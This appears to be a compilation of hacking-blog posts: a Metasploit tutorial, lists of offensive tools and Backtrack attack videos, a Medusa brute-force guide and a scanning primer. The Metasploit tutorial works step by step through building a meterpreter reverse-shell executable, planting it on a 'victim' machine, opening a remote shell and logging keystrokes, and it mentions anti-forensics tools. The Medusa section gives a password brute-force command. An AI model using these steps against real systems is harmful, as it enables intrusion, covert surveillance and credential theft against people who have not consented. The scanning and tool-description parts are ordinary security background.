Katana | A portable multi-boot security suite

Katana a tool which holds over 100 applications under it which can be run a USB/flash drive.As the new v2 has come up with a major addition called "Forge",which helps in further addition of new applications to the booting list.

>>>>>Learn how to use portable applicaions from your PC.

Portable Applications:

1.BackTrack
2.Computer Aided Investigative Environment(CAINE)
3.Ultimate Boot CD for Windows
4.Ophcrack Live

and many more......Find more portable applications here... :)

(Download)

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

--- The Metasploit Framework ---




Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.







If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.





Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.





Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.


The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).


In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.




Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.







Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)







Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.





Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.





Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.





Payload: Actual code which runs on the compromised system after exploitation





Now, what Metasploit IS?





It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.









METASPLOIT ANTI FORENSICS:


Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.


Metasploit comes in the following versions:





1. CLI (Command Line Interface)


2. Web Interface


3. MSF Console


4. MSFwx


5. MSFAPI


I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.


I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.


For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.


Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.


Let the Hacking Begin :


Open up backtrack. You should have a screen similar to this.












The default login credentials are:


Username: root


Pass: toor


Type in


root@bt:~#/etc/init.d/wicd start


to start the wicd manager


Finally, type "startx" to start the GUI mode:


root@bt:~#startx












First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:


root@bt:~#ifconfig


It would be something like 192.168.x.x or 10.x.x.x.


Have a note of it.


Now,


Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole









You should now be having a shell something similar to a command prompt in windows.





msf >


Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.


Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)




root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe


Your local IP is the one you noted earlier and for port you could select 4444.


(Everything has to be entered without quotes)


You should get something like this:


Created by msfpayload (http://www.metasploit.com).


Payload: windows/meterpreter/reverse_tcp


Length: 290


Options: LHOST=192.168.255.130,LPORT=4444


root@bt:/opt/metasploit3/msf3#


Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.









Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.
















Now open the 1st shell window with msfconsole in it.


msf >


Type the following:


msf > use exploit/multi/handler









msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp


PAYLOAD => windows/meterpreter/reverse_tcp









msf exploit(handler) > set LHOST 192.168.255.130


LHOST => 192.168.255.130


msf exploit(handler) > set LPORT 4444


LPORT => 4444









All the connections are done. You have already made an executable file which makes a reverse connection to you.


And now, you have set the meterpreter to listen to you on port 4444.


The last step you have to do now, is to type in “exploit” and press enter,


msf exploit(handler) > exploit









[*] Started reverse handler on 192.168.255.130:4444


[*] Starting the payload handler...


Now, the payload is listening for all the incoming connections on port 444.


[*] Sending stage (749056 bytes) to 192.168.255.1


[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011









You would see a meterpreter prompt like this


meterpreter >


Type in ps to list the active processes


meterpreter > ps









Search for explorer.exe and migrate to the process


meterpreter > migrate 5716


[*] Migrating to 5716...


[*] Migration completed successfully.


meterpreter >









Type in the following:


meterpreter > use priv


Now, if you want to start the Keylogger activity on victim, just type keyscan_start









Now, if you want to go to the victim’s computer,


Jus type shell


meterpreter > shell


Process 5428 created.


Channel 1 created.


Microsoft Windows [Version 6.1.7600]


Copyright (c) 2009 Microsoft Corporation. All rights reserved.


C:\Windows\system32>









You would now be having a command prompt,


Type in whoami, to see the computer’s name of victim :


C:\Windows\system32>whoami


whoami


win7-pc\win 7


C:\Windows\system32>









Let’s suppose you want to start a notepad on the victim’s computer.


Type in:


Let’s say the victim has typed in anything on his computer.


Just type exit, to return to meterpreter.


Now type in keyscan_dump, to see all the typed keystrokes :


meterpreter > keyscan_dump


Dumping captured keystrokes...









GaM3 0V3R


P.S.: The above information is just for educational purposes only. You should test it against the computer you own.

Backtrack Hacking Video Tutorials

This are amazing video tutorials of backtack which include very good collection of hacking videos using backtrack such as sql injection, phone phreaking, wireless hacking, website hacking, network hacking and more. Below is the complete list of videos included in DVD. 

Videos Included In The DVD

• Episode 1 – Network Hacking – Arp Poisoning
• Episode 2 – Wireless Hacking – Cracking WEP
• Episode 3 – Wireless Hacking – DeAuth
• Episode 5 – Lock Picking – Bump Key
• Episode 6 – Phone Phreaking – Beige Box
• Episode 7 – Phone Phreaking/Network Hacking – Sniffing VOIP
• Episode 8 – Lock Picking – DIY Padlock Shims
• Episode 9 – Lock Picking – Mult-Disc Combo Locks
• Episode 10 – Hacking Basics – MD5
• Episode 11 – Website Hacking – Sql Injection
• Episode 12 – Hacking Basics – Backtrack
• Episode 13 – Website Hacking – XSS
• Episode 14 – Staying Secure – SSH Tunnel
• Episode 15 – Modding – Xbox Softmod
• Episode 16 – Wireless Hacking – Cracking WPA
• Episode 17 – Triple Boot – Windows, Backtrack, & Ubuntu
• Episode 18 – Local Password Cracking
• Episode 19 – Lock Picking Basics
• Episode 20 – Ettercap
• Episode 21 – XSS Tunnel
• Episode 22 – Playstation 2 Softmod
• Episode 23 – Cracking WEP Update
• Episode 24 – Bypass Hotspot’s Access Controls

• Underground – Install Backtrack 3 on USB
• Underground – CSRF(Cross Site Request Forgery)
• Underground – Alternate Data Streams
• Underground – Local File Inclusion
• Underground – Windows Privilege Escalation
• Underground – Bluetooth Hacking
• Underground – VMWare
• Underground – Fix Google Mail Enumerator
• Underground – Home Made Lock Picks
• Underground – Downfalls of Anti-Virus Software Part 2
• Underground – Downfalls of Anti-Virus Software
• Underground – Evilgrade
• Underground – Trojan Basics
• Underground – Manipulating Windows User ***s
• Underground – Combine Files
• Underground – Password Phishing
• Underground – Windows SMB Relay Exploit
• Underground – Application Patching
• Underground – Metasploit Autopwn
• Underground – Email Spoofing
• Underground – Introduction
• Extracting Database Information from Information_Schema
• FPGA MD5 Cracker
• Arduino ARP Cop
• Email Injection
• Ping of Death
• DNS Spoofing with Virtual Hosts
• Bypass Cisco Clean Access & Cisco NAC Appliance
• Dual Boot – Windows & Backtrack
• Sql Injection Challenge How-to
• How to use Intel Pro/Wireless 3945ABG in Backtrack 2
• Local Privilege Escalation Vulnerability in Cisco VPN Client

DOWNLOAD HERE

TOP 15 HACKING/CRACKING TOOLS 2013

1. PWN STAR

A bash script to launch the AP, can be configured with a variety of attack options. Including a php script and server index.html, for phishing. Can act as a multi-client captive portal using php and iptables. Exploitation classics such as crime-PDF, De-auth with aireplay, etc..



General Features:
Managing Interfaces and MAC Spoofing
Set sniffing
Phishing Web
Karmetasploit
WPA handshake
De-auth client
Managing Iptables

Download Pwn-Star Here

2. ZED ATTACK PROXY (ZAP)

(ZAP) is an integrated penetration testing tool for finding vulnerabilities in web applications. This tool is designed for use by people with a variety of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to the toolbox tester.



Key Features:
Intercepting Proxy
Active scanners
Passive scanners
Brute Force scanner
Spider
Fuzzer
Port Scanner
Dynamic SSL certificates
API
Beanshell integration

Download ZAP Here

3. SET (SOCIAL ENGINEERING TOOLKIT)

Tools that focus on attacking the human element of weakness and inadvertence. This tool is widely used today and is one of the most successful tools demonstrated at Defcon.



Key Features:
Spear-Phishing Attack Vector
Java Applet Attack Vector
Metasploit Browser Exploit Method
Credential Harvester Attack Method
Tabnabbing Attack Method
Man Left in the Middle Attack Method
Web Jacking Attack Method
Multi-Attack Web Vector
Infectious Media Generator
Teensy USB HID Attack Vector

Download SET Here


4. BURP SUITE

Burp Suite is a very nice tool for web application security testing. This tool is great for pentester and security researchers. It contains a variety of tools with many interfaces between them designed to facilitate and accelerate the process of web application attacks.



General Function:
Interception proxies
Radar and spiders crawling
Webapps scanner
Tool assault
Repeater and sequencer tools

Download Burp Suit Here

5. ETTERCAP

Ettercap is a multipurpose sniffer / interceptor / logger for Local Area Network . It supports active and passive dissection of many protocols (even in code) and includes many feature for network and host analysis.



General Function:
To capture traffic and data
To do logging network
Etc.

Download Ettercap Here

6. SANS INVESTIGATIVE FORENSIC TOOLKIT (SIFT)

The SANS Investigative Forensic Toolkit (SIFT) Workstation is a VMware Appliance that can be configured with all the requirements to perform a detailed digital forensic. Compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The new version has been completely rebuilt on the Ubuntu base with many additional tools and capabilities that are used in modern forensic technology.



General Function :
iPhone, Blackberry, and Android Forensic Capabilities
Registry Viewer (YARU)
Compatibility with F-Response Tactical, Standard, and Enterprise
PTK 2.0 (Special Release - Not Available for Download)
Automated Generation Timeline via log2timeline
Many Firefox Investigative Tools
Windows Journal Parser and Shellbags Parser (jp and sbag)
Many Windows Analysis Utilities (prefetch, usbstor, event logs, and more)
Complete Overhaul of Regripper Plugins (added over 80 additional plugins)

Download SIFT Here


7. WIRESHARK


Wireshark is the most widely used and most popular in the world the protocol analyzer, and is the de facto standard across many industries and educational institutions to analyze the network in different protocol.

Image has been scaled down 18% (700x518). Click this bar to view original image (845x625). Click image to open in new window.

General Function:
Live capture and offline analysis
Standard three-pane packet browser
Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
Captured data network can be browsed via a GUI, or via the TTY-mode tshark utility
The most powerful display filters in the industry
Rich VoIP analysis
Read / write many different capture file formats
Etc.

Download wireshark Here


8. WEBSPLOIT


WebSploit is an Open Source Project for Remote Scan and Analysis System of the weaknesses in web applications.




Key Features: 
[>] Social Engineering Works
[>] Scan, Web Crawler & Analysis
[>] Automatic Exploiter
[>] Support Network Attacks
-
[+] Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+] WMAP - Scan, Target Used Crawler From Metasploit WMAP plugin
[+] format infector - inject the payload into reverse and bind file format
[+] phpmyadmin Scanner
[+] LFI Bypasser
[+] Apache Users Scanner
[+] Dir Bruter
[+] admin finder
[ +] MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+] MITM - Man In The Middle Attack
[+] Java Applet Attack
[+] MFOD Attack Vector
[+] USB Infection Attack
[+] Dos ARP Attack
[+ ]'s Killer Attack
[+] Attack Fake Update
[+] Fake Access Point Attack


Download Websploit Framework Here

9. WINAUTOPWN

WinAutoPWN is a tool that is used to exploit the Windows Framework directly, so that we are automatically going to be an administrator on the windows. 

Image has been scaled down 30% (700x505). Click this bar to view original image (999x720). Click image to open in new window.

Download WinAutoPWN Here


10. HASHCAT

Hashcat are a variety of tools to crack passwords in encrypted, it is very powerful for password recovery.

Image has been scaled down 3% (700x510). Click this bar to view original image (720x524). Click image to open in new window.

General Function:
Multi-Threaded
Free
Multi-Hash (up to 24 million hashes)
Multi-OS (Linux, Windows and OSX native binaries)
Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)
SSE2 accelerated
All Attack-Modes except Brute-Force and Permutation can be extended by rules
Very fast Rule-engine
Rules compatible with JTR and PasswordsPro
Possible to resume or limit session
Automatically recognizes recovered hashes from outfile at startup
Can automatically generate random rules
Load saltlist from an external file and then use them in a Brute-Force Attack variant
Able to work in an distributed environment
Specify multiple wordlists or multiple directories of wordlists
Number of threads can be configured
Lowest priority threads run on
30 + Algorithms is implemented with performance in mind
... and much more

Download HashCat Here

11. UNISCAN

Uniscan is a scanner for web applications, written in perl for Linux. Currently Uniscan version is 6.2.



General Function:Identification of system pages through a Web Crawler.
Use of threads in the crawler.
Control the maximum number of requests the crawler.
Control of variation of system pages identified by Web Crawler.
Control of file extensions that are ignored.
Test of pages found via the GET method.
Test the forms found via the POST method.
Support for SSL requests ( HTTPS ).
Proxy support.
Generate site list using Google.
Generate site list using Bing.
Plug-in support for Crawler.
Plug-in support for dynamic tests.
Plug-in support for static tests.
Plug-in support for stress tests.
Multi-language support.
Web client.General Function:
Identification of system pages through a Web Crawler.
Use of threads in the crawler.
Control the maximum number of requests the crawler.
Control of variation of system pages identified by Web Crawler.
Control of file extensions that are ignored.
Test of pages found via the GET method.
Test the forms found via the POST method.
Support for SSL requests ( HTTPS ).
Proxy support.
Generate site list using Google.
Generate site list using Bing.
Plug-in support for Crawler.
Plug-in support for dynamic tests.
Plug-in support for static tests.
Plug-in support for stress tests.
Multi-language support.
Web client.

Download Uniscan Here


12. OLYYDBG

OllyDbg is a 32-bit assembler debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source code is not available.




General Function:
Intuitive user interface, no cryptical commands
Code analysis - traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
Directly loads and debugs DLLs
Object file scanning - locates routines from object files and libraries
Allows for user-defined labels, comments and function descriptions
Understands debugging information in Borland ® format
Saves patches between sessions, writes them back to executable file and updates fixups
Open architecture - many third-party plugins are available
No installation - no trash in registry or system directories
Debugs multithreaded applications
Attaches to running programs
Configurable disassembler, supports both MASM and IDEAL formats
MMX, 3DNow! and SSE instructions and the data types, Including Athlon extensions
Full UNICODE support
Dynamically recognizes ASCII and UNICODE strings - also in Delphi format!
Recognizes complex code constructs, like call to jump to procedure
Decodes calls to more than 1900 standard API and 400 C functions
Gives context-sensitive help on API functions from external help file
Sets conditional, logging, memory and hardware breakpoints
Traces program execution, logs arguments of known functions
Shows fixups
Dynamically traces stack frames
Searches for imprecise commands and masked binary sequences
Searches whole allocated memory
Finds references to constant or address range
Examines and modifies memory , sets breakpoints and Pauses program on-the-fly
Assembles commands into the shortest binary form
Starts from the floppy disk


Download OllyDbj Here


13. BBQSQL

BBQSQL an Opensource SQL injection tools with the framework specifically designed to carry out the process in hyper fast, database agnostic, easy to setup, and easy to modify. This is another amazing release from Arsenal Blackhat USA 2012. When conducting security assessments of applications, we often find that it is difficult to SQL vulnerabilities exploitable, with this tool will be extremely easy.
BBQSQL written in the Python programming language. This is very useful when complex SQL injection attack vulnerabilities. BBQSQL also a semi-automated tool, which allows little customization for those who are finding it difficult to trigger a SQL injection. The tool is built to be database agnostic and very versatile. It also has an intuitive UI for setting up the attack much easier.





General Function:
SQL Injection Tools
URL
HTTP Method
Headers
Cookies
Encoding methods
Redirect behavior
Files
HTTP Auth
Proxies

Download BBQSQL Here


14. CRYPTOHAZE


Tools to crack password / hash where cryptohaze supports CUDA, OpenCL , and the CPU code (SSE, AVX, etc.). Can run on OS that support CUDA. These are intended to make it easier to pentester did crack the hash.





General Function:
Crack various kinds of hash
Showing results from crackhash
Cracking on various OS platforms


Download Cryptohaze Here


15. SAMURAI WEB TESTING FRAMEWORK (SWTF)

SWTF is used to do testing / pentest against web application, is used to find a weakness and exploited to perform web. 



General Function:
Web Scanner
Web Mapping
Web Exploitation


Download SWTF Here


SO Thats It .enjoy 

Backtrack 5 : Exploitation

Medusa

Medusa is a log-in brute forcer that attempts to gain access to remote services by guessing at the user password. Medusa is capable of attacking a large number of remote services including FTP, HTTP, MySQL, Telnet, VNC, Web Form, and more. In order to use Medusa, you need several pieces of information including the target IP address, a username or username list that you are attempting to log in as, a password or dictionary file containing multiple passwords to use when logging in, and the name of the service you are attempting to authenticate with.

Medusa comes installed on Backtrack 5. However, if you are using a different version of backtrack without Medusa type:

apt-get update
apt-get install medusa

When using online password crackers, the potential for success can be greatly
increased if you combine this attack with information gathered from reconnaissance and scanning. An example of this is when you find usernames, passwords, and email addresses. Programs like Medusa will take a username and password list and keep guessing until it uses all the passwords. Be aware that some remote access systems employ a password throttling technique that can limit the number of unsuccessful log-ins you are allowed. Your IP address can be blocked or the username can be locked out if you enter too many incorrect guesses.

Backtrack includes a few word lists that you can use for your brute forcing adventures. You can find one list at:

/pentest/passwords/wordlists/

In order to execute the brute-force attack, you open a terminal and type the following:

medusa –h target_ip –u username –P path_to_password_dictionary –M service_to_attack

“-h” is used to specify the IP address of the target host. The “-u” is used for a single username that Medusa will use to attempt log-ins. “-P” is used to specify an entire list containing multiple passwords. The “-P” needs to be followed by the actual location or path to the dictionary file. The “-M” switch is used to specify which service we want to attack.

Here I launch an attack against my own ssh server.

More to come!

Backtrack 5 : Scanning

The scanning process can be divided into three steps:

1. Determining if a system is active.
2. Port scanning the system.
3. Scanning the system for vulnerabilities.

Step 1 is the process of determining whether a target system is turned on and capable of communicating or interacting with our machine. This step is the least reliable and we should always continue with steps 2 and 3 regardless of the outcome of this test. Regardless, it is still important to conduct this step and make note of any machines that respond as alive.

Ports provide a way or location for software and networks to communicate with hardware like a computer. A port is a data connection that allows a computer to exchange information with other computers, software, or devices.

Common Ports and their Service

Port      Number Service
20        FTP data transfer
21        FTP control
22        SSH
23        Telnet
25        SMTP (e-mail)
53        DNS
80        HTTP
443      HTTPS

Pings and Ping Sweeps

A ping is a special type of network packet called an ICMP packet. Pings work by sending specific types of network traffic, called ICMP Echo Request packets, to a specific interface on a computer or network device. If the device (and the attached network card) that received the ping packet is turned on and not restricted from responding, the receiving machine will respond back to the originating machine with an Echo Reply packet. Aside from telling us that a host is alive and accepting traffic, pings provide other valuable information including the total time it took for the packet to travel to the target and return.
Pings also report traffic loss that can be used to gauge the reliability of a network
connection.

Ping google.com with the count argument -c 4 to ping 4 times.

The simplest way to run a ping sweep is with a tool called FPing. FPing is built into Backtrack and is run from the terminal. The easiest way to run FPing is to open terminal window and type the following:

fping –a –g 172.16.45.1 172.16.45.254>hosts.txt

The “–a” argument is used to show only the live hosts in the output. This makes our final report much cleaner and easier to read. The “–g” is used to specify the range of IP addresses we want to sweep. You need to enter both the beginning and the ending IP addresses. In this example, we scanned all the IPs from 172.16.45.1 to 172.16.45.254. The “>” character is used to pipe the output to a file, and the hosts.txt is used to specify the name of the file our results will be saved to.

Port Scanning

There are a total of 65,536 (0–65,535) ports on every computer. Ports can be
either TCP or UDP depending on the service using the port. We scan computers to see what ports are in use or “open”. This gives us a better picture of the purpose of the machine, which gives us a better idea about how to attack the box.

TCP 3-Way Handshake

Before we go on, we first have to know how computers on a network communicate with each other. When two computers want to communicate, they go through a processes known as the 3-way handshake. The first computer A will send a synchronize packet to the other computer B. Then, if computer B is listening (has its port open), it will respond back to A with a synchronize-acknowledgement packet. Finally, computer A will send an acknowledgement packet to computer B, and the two computers will communicate as usual.

Using Nmap

Nmap was written by Gordon Lyon and is available for free from www.insecure.org and is built into today’s Backtrack Linux 5.

When we conduct a port scan, Nmap will create a packet and send it to each designated port on the computer just like the 3-way handshake. The goal is to determine what kind of a response we get from the target ports.

To use Nmap, open up the terminal and type:

nmap -p- 192.168.56.101

Here I scan a Windows XP machine on my network.

The “-p-” tells nmap to scan all ports on a target machine. The 10.0.2.15 is the local ip of the target machine.

Vulnerability Scanning

To scan systems for vulnerabilities, we will use a vulnerability scanner. There are several good scanners available, but we will be focusing on Nessus. To install Nessus type:

root@bt:~# apt-get install nessus

Then, to access Nessus via the GUI go to:
Applications -> Backtrack -> Vulnerability Assessment -> Vulnerability Scanner -> Nessus -> Nessus Start.